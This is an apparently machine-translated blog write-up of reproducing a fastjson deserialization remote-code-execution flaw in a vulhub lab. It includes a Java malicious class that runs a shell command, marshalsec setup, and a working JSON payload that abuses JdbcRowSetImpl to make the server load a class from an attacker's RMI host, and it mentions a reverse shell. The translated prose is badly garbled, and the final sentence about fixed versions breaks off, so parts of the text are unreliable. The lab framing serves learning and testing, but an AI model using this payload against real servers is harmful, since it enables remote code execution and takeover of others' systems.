0x00: Introduction
This vulnerability had been intended to be broke after pick the time to reproduce, and later a friend suddenly sent to the site of their existence fastjson This vulnerability is white hat, made a report. Since the vulnerability environment fingertips, I intend to try to start direct. In my imagination, of course the soul out of the carriage shell (fog), the fact that things will never be so simple, I doubt they secretly fixes this vulnerability because I did not receive a response even rmi server .... so I P environment is based on vulhub master reproducible.
0x01: Preparing the Environment
Vulhub on github directly downloaded into fastjson vulnerabilities environment directory, execute
dcoker-compose up -d
Open environment
Then open rmi or ldap services in their own vps
Recommended marshalsec rapid opening rmi or ldap services
address:
https://github.com/mbechler/marshalsec
Download marshalsec, compiled using maven jar package
mvn clean package -DskipTests
Or rmi open ldap service
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
TouchFile here is that I compiled malicious class, the compiled TouchFile.class on the tomcat webapps / ROOT directory, java source code as follows
import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"touch", "/tmp/success"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } }
Open tomacat, confirm that you can visit http: // ip: 8080 / TouchFile.class
Why should confirm this yet, because I started the class files in the webapps directory has not been reproduced successfully. Then I saw the tomcat access-log rmi really found my request to visit a malicious class, but is 404 ... I have a life once suspected ...
0x02: Attack
Direct request to build a good environment vulnerability, port 8090 is changed to the method POST
payload:
"a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://ip:8088/TouchFile", "autoCommit":true } }
After sending the request, the server RMI receive a response, the remote loading malignant class TouchFile.class
You can see has been executed successfully touch / tmp / success
Similarly rebound shell
0x03: Some pit
Because before the server has expired did not buy new, this vps is just bought, bought Ali cloud forget configured firewall is very embarrassing ... rmi she did not receive a request I was very confused, the results of my a friend asked me your firewall configuration yet ....
Then place the problem is this kind of malicious path (my java is too dishes this is not a pit which I too dishes)
The final step is rmi and ldap way to use this version are required, they are fixed in the following versions
